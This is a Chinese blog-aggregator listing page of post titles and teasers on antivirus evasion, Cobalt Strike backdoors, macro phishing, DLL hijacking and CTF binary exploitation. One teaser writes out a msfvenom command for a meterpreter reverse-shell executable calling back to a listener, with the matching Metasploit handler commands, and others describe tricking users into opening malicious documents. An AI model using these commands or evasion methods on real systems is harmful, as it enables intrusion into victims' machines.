免杀Shellcode

CobaltStrike简易免杀后门制作

事先声明:本技术文章仅限用于学习和研究,不得将上述内容用于商业或者非法用途,否则,一切后果请您自负。本博客的技术来源于作者网络上所学。您在技术复现前必须得到攻击目标本人的同意,并且在复现结束后从您的电脑中彻底删除相关内容。如有违法事件发生与作者本人无关。一.平台搭建启动CS服务器命令./teamserver服务器IP(实际要用公网服务器IP)密码客户端连接若连接不成功,需要检测是否开启50050端
天津曲艺团·2023-10-07 18:40

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS

RLO伪装图片执行利用msf生成木马x.exemsfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.96.128LPORT=4444-fexe-ox.exeMetasploit打开反向监听的命令useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcp下面利用RLO对x.
无名安全·2023-10-07 18:40

【黑客免杀攻防】读书笔记1 - 初级免杀基础理论(反病毒软件特征码提取介绍、免杀原理、壳)...

基础篇初级免杀技术第1章变脸免杀是一种反杀毒技术。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为
weixin_30642869·2023-10-07 18:08

绕过杀毒软件,免杀木马制作

绕过杀毒软件,免杀木马制作(以AVGAntiSpyware杀毒软件为例)一、将Sever.exe打开,分块生成100个文件二、使用AVGAntiSpyware查杀生成的文件,再二次处理,重复这个过程,直到缩小到很小的范围
youhao108·2023-10-07 18:37

远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)

本专题文章导航1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2.远控免杀专题(2)-msfvenom隐藏的参数:https
Ms08067安全实验室·2023-10-07 18:37

远控免杀专题(22)-SpookFlare免杀

转载:https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA免杀能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
p0inter·2023-10-07 18:36

社会工程学 | office宏分离免杀及应急处置

Office宏分离免杀的方式是在目标用户的office开启宏功能的前提下,诱骗其使用office办公软件打开文档,通过加载远程的恶意宏代码,达到控制目标主机权限的目的。
betasec·2023-10-07 18:06

远控免杀专题(16)-Unicorn免杀

0x01免杀能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
p0inter·2023-10-07 18:06

免杀对抗-反沙盒+反调试

反VT-沙盒检测-Go&Python介绍:近年来,各类恶意软件层出不穷,反病毒软件也更新了各种检测方案以提高检率。其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说沙盒就是为运行中的程序提供的隔离环境。为了逃避沙箱/安全人员的检测,恶意软件使用了各类识别沙箱/虚拟机的技术,用于判断自身程序是否运行在沙箱/虚拟机中。go语言1.使用GoLan
xiaoheizi安全·2023-10-07 18:36

office钓鱼免杀宏的制作

office钓鱼免杀宏的制作由于国内近些年来,红蓝对抗的升级,各类hvv,重保,防守方上各种杀软,edr,防御手段层出不穷,不会免杀真的是欲哭无泪,今天带来EvilClippy恶意文档助手,对office
Sword-heart·2023-10-07 18:06

免杀入门学习---------2019.8.27

这篇随笔的大部分内容来自《黑客免杀攻防》第一章说的免杀的历史,点了一下免杀和Rootkit的区别。Rootkit的词条介绍当然,一个菜鸟怎么会理解呢,只能默默地记一下,接受了。
Looun·2023-10-07 18:05

免杀入门(基础理论)

免杀理论基础本文主要为免杀入门的基础理论笔记,前几年写下的找到正好发出来,因审核需要删除部分内容,有免杀基础和一定实操经验人士可以跳过本文概念免杀全称为反杀毒技术AntiAnti-Virus简称“免杀
S1aine·2023-10-07 18:35

word宏木马分离免杀

apache服务上2、修改文档“2.docx"文件名为”2.zip“,并将“2.zip”进行解压3、修改下面的文件4、将修改后的文件夹重新压缩为"2.zip",并修改后缀名为“2.docx”5、成功实现分离免杀
30岁学java的貧曾·2023-10-07 18:35

Shellcode免杀,过360、火绒、windows-Defender

shellcode简介Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段
刘—手·2023-10-07 18:04

121-宏免杀

CS生成宏&上线生成宏1.cs生成宏,如下图操作2.点击复制宏代码,保存下来cs上线注:如下操作使用的是word,同样的操作也适用于Excel1.新建一个word文档,使用word打开。点击文件——2.更多——选项——3.自定义功能区——勾选开发工具——点击确定4.点击开发工具——新建宏——任意宏名——宏的位置(之前新建的word文档)——创建5.跳转到如下,将cs生成的宏代码写入——点击保存——
xiaoheizi安全·2023-10-07 18:32

06. http协议基础,带你了解网络访问

WEB网站只是单一的网站服务,在渗透测试过程中可能不是攻击网站,而是寻找其他服务漏洞,如数据库、FTP等渗透测试覆盖面更为广泛,需要考虑如何深入利用漏洞使得攻击效果最大化如提权、内网攻击、域环境攻击、制作免杀后门等渗透测试学习路径
程序员小勇·2023-10-06 18:12

章节2:Webshell介绍

安全性高,隐匿性强,可变形免杀小马体积小,功能少只有文件上传功能大马体积大,功能全能够管理数据库、文件管理、对站点进行快速的信息收集,甚至能够提权Webshell集合https://github.com
程序员小勇·2023-10-06 18:41

ret2syscall

stackoverflow/basic-rop-zh/checksec,查看程序保护机制,开了NXida,main函数,f5gets函数,存在栈溢出,先算一下偏移量为112发现nosystemandnoshellcode
y1deer·2023-10-05 01:08

0day 第10章--10.4节:攻击异常处理突破GS(2)

将SHE句柄覆盖为shellcode地址即可。
Angelki·2023-10-04 20:30

0day 第10章--10.4节:攻击异常处理突破GS(1)

将SHE句柄覆盖为shellcode地址即可。实验环境:Winxpsp3vs2010Release版本、禁用优化根据网上把safeseh关闭了,但是没用。。。
Angelki·2023-10-04 20:59

Linux pwn入门教程(2)——shellcode的使用,原理与变形

作者:Tangerine@SAINTSEC0×00shellcode的使用在上一篇文章中我们学习了怎么使用栈溢出劫持程序的执行流程。为了减少难度,演示和作业题程序里都带有很明显的后门。
张悠悠66·2023-10-04 15:12

ret2shellcode 的泄露puts@got表

disassemblemain获取read@plt地址0x4005000x000000000040067e:call0x400500disassemble0x400500地址发现[email protected]会执行jmp指令jmp到的其实这是plt表对应函数的got表查看jmp地址的内存内容x/20gx0x601028发现[email protected]保存了read函数的blic中的地址callread—>r
wing_7·2023-10-04 14:41

【pwn】记一道shellcode侧信道攻击

【pwn】记一道shellcode侧信道攻击前言契机来源于K0nashi师傅给的一道题目,让我来写写shellcode,那当然是写啊!
woodwhale·2023-10-04 14:10

利用ret2libc绕过DEP安全机制

栈空间也被操作系统设置了不可执行属性,因此注入的Shellcode就无法执行了导向系统库函数执行(ret2libc)攻击方法:系统函数库(Linux称为glibc)有个s
_well_s·2023-10-04 14:37

栈溢出学习(二)之 jmp esp & return2libc

前言栈溢出学习(二),讲述jmpesp&&return2libc原理及其实践方法系列文章栈溢出学习(一)之利用预留后门&return2shellcode栈溢出学习(二)之jmpesp&return2libc
Pz_mstr·2023-10-04 14:06

PWN ret2text

0X01什么是ROPROP就是shellcode的一种特殊写法。ROP技术就是不需要自己动手写shellcode,只是利用文件中给出的多个跳转指令,实现利用原有代码达到获取shell的目的。
prettyX·2023-10-04 14:36

linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad

文章目录Whatisret2syscallpwn题思路例题保护机制写payload打开flag读取flag写到输出中生成shellcode开始做题调用read(0,mem,0x1000)把我们真正的shellcode
azraelxuemo·2023-10-04 14:05

PWN入门系列(3)ROP的利用

ret2shellcode原理ret2shellcode,即控制程序shellcode代码。
二进制菜鸟K1rito·2023-10-04 14:05

【PWN · ret2shellcode | “jmp esp“】[i春秋]ret2shellcode

当溢出长度不足时,如何将shellcode放入padding位值,并执行呢?
Mr_Fmnwon·2023-10-04 14:34

免杀对抗-成品EXE免杀-反特征码-通用跳转

一、exe程序生成1.使用如下shellcode加载器,生成c/c++语言的exe程序加载器:1.c#include#include#pragmacomment(linker,"/section:.data
xiaoheizi安全·2023-10-04 11:53

免杀对抗-DLL劫持免杀

C&Py-DLL劫持-语言-调用加载1.使用visualstudio创建项目2.将文件名重命名为.c后缀3.将如下加载器代码生成dll文件加载器代码:#include"pch.h"#include#include#include#pragmacomment(linker,"/subsystem:\"Windows\"/entry:\"mainCRTStartup\"")//windows控制台程序
xiaoheizi安全·2023-10-04 10:37

PWN入门(6)写入shellcode

简介“pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为‘p’与‘o’在标准英文键盘上的位置是相邻的,PWN也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入05文件夹https://
Ba1_Ma0·2023-10-03 22:26

PWN总结

文章目录1.gdb基本命令2.radare2基本指令3.pwnTools使用3.1.安装3.2.基本模块3.3.Tubes读写接口3.4.汇编与反汇编3.5.shellcode生成器3.6.elf文件操作
醉等佳人归·2023-10-03 00:57

pwn入门小技巧

,整数溢出,格式化字符串目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc所以可以大体分为两类把:libc,kernel栈利用:有ret2libc,ret2shellcode
是脆脆啊·2023-10-03 00:56

ciscn_2019_s_9

littleRELRO:PartialRELROStack:NocanaryfoundNX:NXdisabledPIE:NoPIE(0x8048000)RWX:HasRWXsegments32位,啥也没开,开心愉悦写shellcodeintpwn
YameMres·2023-10-01 23:08

picoctf_2018_shellcode

picoctf_2018_shellcodeArch:i386-32-littleRELRO:PartialRELROStack:NocanaryfoundNX:NXdisabledPIE:NoPIE(
YameMres·2023-10-01 23:05

【逆向】在程序空白区添加Shellcode

目录硬编码内存对齐和文件对齐节表实战滴水逆向03-17#includeLRESULTCALLBACKWndProc(HWNDhwnd,UINTmsg,WPARAMwParam,LPARAMlParam);intWINAPIWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,PSTRszCmdLine,intiCmdShow){//定义窗口类WNDCL
cccsl_·2023-10-01 06:34

网络安全(黑客)自学

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-09-30 15:08

网络安全(黑客技术)自学

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-09-30 15:38

mrctf2020_shellcode_revenge

mrctf2020_shellcode_revengeArch:amd64-64-littleRELRO:FullRELROStack:NocanaryfoundNX:NXdisabledPIE:PIEenabledRWX
YameMres·2023-09-30 13:08

Windows 内存漏洞缓解措施

Shellcode利用缓解GSGS又称栈COOKIE,主要是为了防御栈溢出,而且非常有效绕过1)使用栈中的数据结构进行绕过,典型的虚函数(对象)、数组、指针结构,COOKIE只对有字符缓冲区局部变量的函数进行防御
Flying ladybird·2023-09-30 05:04

【红队攻防】从零开始的木马免杀到上线

0、环境配置说明应该全部使用云服务器完整演示比较好,奈何太穷了买不起服务器,只能用本地环境演示。所需环境如下:系统环境:CentOS7,Windows10软件环境CobaltStrike4.7,ShellQMaker,360杀毒一、CobaltStrike环境配置CentOS7.8环境安装CobaltStrike必备工具安装yum-yinstalllrzsz,unzip上传文件解压然后切换至Cob
为赋新词强说愁·2023-09-30 03:35

免杀对抗-Nim语言免杀-加载工具+加载方式

Nim语言-加载工具-NimShellCodeLoader项目配置环境:1.下载Nim语言&配置bin目录环境变量链接:https://nim-lang.org/install_windows.html
xiaoheizi安全·2023-09-29 23:40

【安全研究】Linux后渗透常见后门驻留方式分析

又或者,在RedTeam拿下一台服务器,为达到长久控制的目的而专门定制持久化后门(免杀肯定是必须的)的前提下,他们会如何结合系统自身的某些特性,达到持久化控制的效果?
安全狗(safedog)·2023-09-29 07:55

免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写

无文件落地&分离拆分无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。
xiaoheizi安全·2023-09-27 10:52

免杀对抗-内存加载-shellcode转换-UUID+MAC+IPV4

内存加载-UUID地址-ShellCode转换介绍:通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。
xiaoheizi安全·2023-09-27 10:16

Golang基础之关键字

Type参考##https://blog.csdn.net/SHELLCODE_8BIT/article/details/122837699type有如下几种用法:定义结构体定义接口类型定义类型别名类型查询类型定义
叱咤少帅(少帅)·2023-09-26 22:42

免杀技术,你需要学习哪些内容

免杀技术,你需要学习哪些内容?什么是免杀免杀是指通过各种技术手段使恶意软件或病毒能够逃避杀毒软件的检测和阻止,成功地感染目标系统。
自饰者六便士·2023-09-26 17:21

认识ShellCode

1认识SHELLCODEshellcode的本质其实就是一段可以自主运行的代码。
凌木LSJ·2023-09-25 15:33

认识JSP webshell免杀

【virustotal】【D盾】【shellpub】接下来进行免杀免杀就是将这些被识别的特征进行替换,绕过,混淆和干扰。
凌木LSJ·2023-09-25 15:32
上一页 2 3 4 5 6 7 8 9 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他